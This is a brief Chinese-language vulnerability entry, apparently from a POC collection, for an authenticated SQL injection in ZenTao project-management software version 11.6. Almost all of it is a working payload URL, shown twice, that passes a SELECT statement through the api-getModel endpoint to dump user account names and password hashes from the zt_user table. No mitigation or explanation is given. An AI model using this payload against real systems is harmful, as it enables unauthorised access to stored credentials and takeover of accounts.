禅道11.6后台SQL注入
影响范围¶
禅道 11.6
漏洞POC¶
Payload:
http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user
禅道 11.6
Payload:
http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user